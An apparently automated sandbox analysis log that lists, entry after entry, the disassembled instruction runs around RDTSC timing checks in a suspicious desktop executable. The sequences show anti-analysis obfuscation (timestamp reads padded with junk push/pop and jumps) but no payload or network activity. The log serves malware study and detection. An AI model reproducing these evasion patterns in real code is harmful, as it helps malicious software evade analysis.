Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AE4BD second address: 14AE4C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AE4C3 second address: 14AE4C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AE4C9 second address: 14AE4CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AEA41 second address: 14AEA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AEA47 second address: 14AEA4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF3B7 second address: 14AF3BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF56B second address: 14AF571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF571 second address: 14AF575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF575 second address: 14AF57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF57B second address: 14AF590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FB0A4FB5B8Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF590 second address: 14AF596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF596 second address: 14AF59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14AF59A second address: 14AF5A4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB0A5355D56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B4EE5 second address: 14B4EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jnl 00007FB0A4FB5B86h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B4EF3 second address: 14B4EFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B4EFD second address: 14B4F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B54FF second address: 14B5524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FB0A5355D56h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5524 second address: 14B5528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5528 second address: 14B552E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B552E second address: 14B5551 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB0A4FB5B9Ah 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB0A4FB5B92h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5551 second address: 14B555C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B4AE8 second address: 14B4B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0A4FB5B97h 0x00000009 popad 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5AD3 second address: 14B5AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0A5355D63h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5AEA second address: 14B5AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5AEE second address: 14B5AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FB0A5355D56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5AFE second address: 14B5B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5B02 second address: 14B5B06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5B06 second address: 14B5B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5B10 second address: 14B5B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5DED second address: 14B5DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5DF1 second address: 14B5DF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5DF5 second address: 14B5DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BCC64 second address: 14BCC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BCC6A second address: 14BCC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BCC70 second address: 14BCC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB0A5355D56h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007FB0A5355D56h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BCC85 second address: 14BCC91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FB0A4FB5B86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BCC91 second address: 14BCC9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FB0A5355D56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BC0B9 second address: 14BC0C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB0A4FB5B86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BC0C5 second address: 14BC0C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BC253 second address: 14BC25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BC25A second address: 14BC265 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FB0A5355D56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BC50C second address: 14BC510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BC510 second address: 14BC536 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB0A5355D56h 0x00000008 jmp 00007FB0A5355D60h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FB0A5355D5Ch 0x00000015 jnc 00007FB0A5355D56h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147E7CF second address: 147E7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147E99A second address: 147E9B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FB0A5355D61h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147EDED second address: 147EDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147EEE5 second address: 147EEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147EEE9 second address: 147EF14 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jns 00007FB0A4FB5B98h 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FB0A4FB5B86h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147EF14 second address: 147EF26 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jng 00007FB0A5355D64h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147EF26 second address: 147EF2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147EF2C second address: 147EF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FB0A5355D56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147F02B second address: 147F048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147F048 second address: 147F052 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB0A5355D5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147F052 second address: 147F0AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FB0A4FB5B8Eh 0x0000000c xchg eax, esi 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FB0A4FB5B88h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 movzx edx, bx 0x0000002a pushad 0x0000002b mov dword ptr [ebp+129C1B0Bh], eax 0x00000031 mov ebx, dword ptr [ebp+129C2C87h] 0x00000037 popad 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FB0A4FB5B94h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147F0AE second address: 147F0BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D5Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14C4D32 second address: 14C4D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14C4D38 second address: 14C4D5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Ah 0x00000007 jmp 00007FB0A5355D68h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14C4D5E second address: 14C4D80 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB0A4FB5B92h 0x00000008 jmp 00007FB0A4FB5B8Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FB0A4FB5B86h 0x00000015 jp 00007FB0A4FB5B86h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14C4EBA second address: 14C4ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FB0A5355D68h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14C4ED9 second address: 14C4EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FB0A4FB5B86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14C82C5 second address: 14C82D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FB0A5355D5Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14C82D8 second address: 14C82DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14C82DC second address: 14C82E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14CAFAA second address: 14CAFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14CAFB0 second address: 14CAFC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB0A5355D62h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14CDAC0 second address: 14CDAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jo 00007FB0A4FB5B86h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14CD7BD second address: 14CD7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D32DA second address: 14D32E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D3462 second address: 14D3481 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147F59C second address: 147F5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FB0A4FB5B8Ch 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB0A4FB5B95h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147F5CC second address: 147F651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007FB0A5355D56h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007FB0A5355D64h 0x00000012 mov ebx, dword ptr [ebp+12B60551h] 0x00000018 and edx, dword ptr [ebp+129C1F8Bh] 0x0000001e add eax, ebx 0x00000020 mov dword ptr [ebp+129C5D5Dh], ebx 0x00000026 push eax 0x00000027 ja 00007FB0A5355D68h 0x0000002d mov dword ptr [esp], eax 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FB0A5355D58h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a mov di, 1698h 0x0000004e push 00000004h 0x00000050 mov cx, 2413h 0x00000054 push eax 0x00000055 push ecx 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D39CF second address: 14D39D4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D39D4 second address: 14D39E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FB0A5355D56h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D39E1 second address: 14D39EB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB0A4FB5B86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D978E second address: 14D9793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D8A75 second address: 14D8A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D8A7B second address: 14D8A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D8D16 second address: 14D8D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D8D1C second address: 14D8D40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FB0A5355D5Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D8F17 second address: 14D8F21 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB0A4FB5B86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D905B second address: 14D9065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D9065 second address: 14D907F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB0A4FB5B95h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D907F second address: 14D9089 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB0A5355D5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D920C second address: 14D9212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14D9212 second address: 14D9218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E2A90 second address: 14E2AAD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FB0A4FB5B9Eh 0x00000010 jmp 00007FB0A4FB5B8Ah 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E32E5 second address: 14E32EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E32EB second address: 14E32F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E32F1 second address: 14E32F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E32F5 second address: 14E3301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E3EB7 second address: 14E3EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E3EBC second address: 14E3EC1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E3EC1 second address: 14E3ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FB0A5355D56h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E3ED2 second address: 14E3F10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B96h 0x00000007 jmp 00007FB0A4FB5B99h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007FB0A4FB5B86h 0x00000019 rdtsc
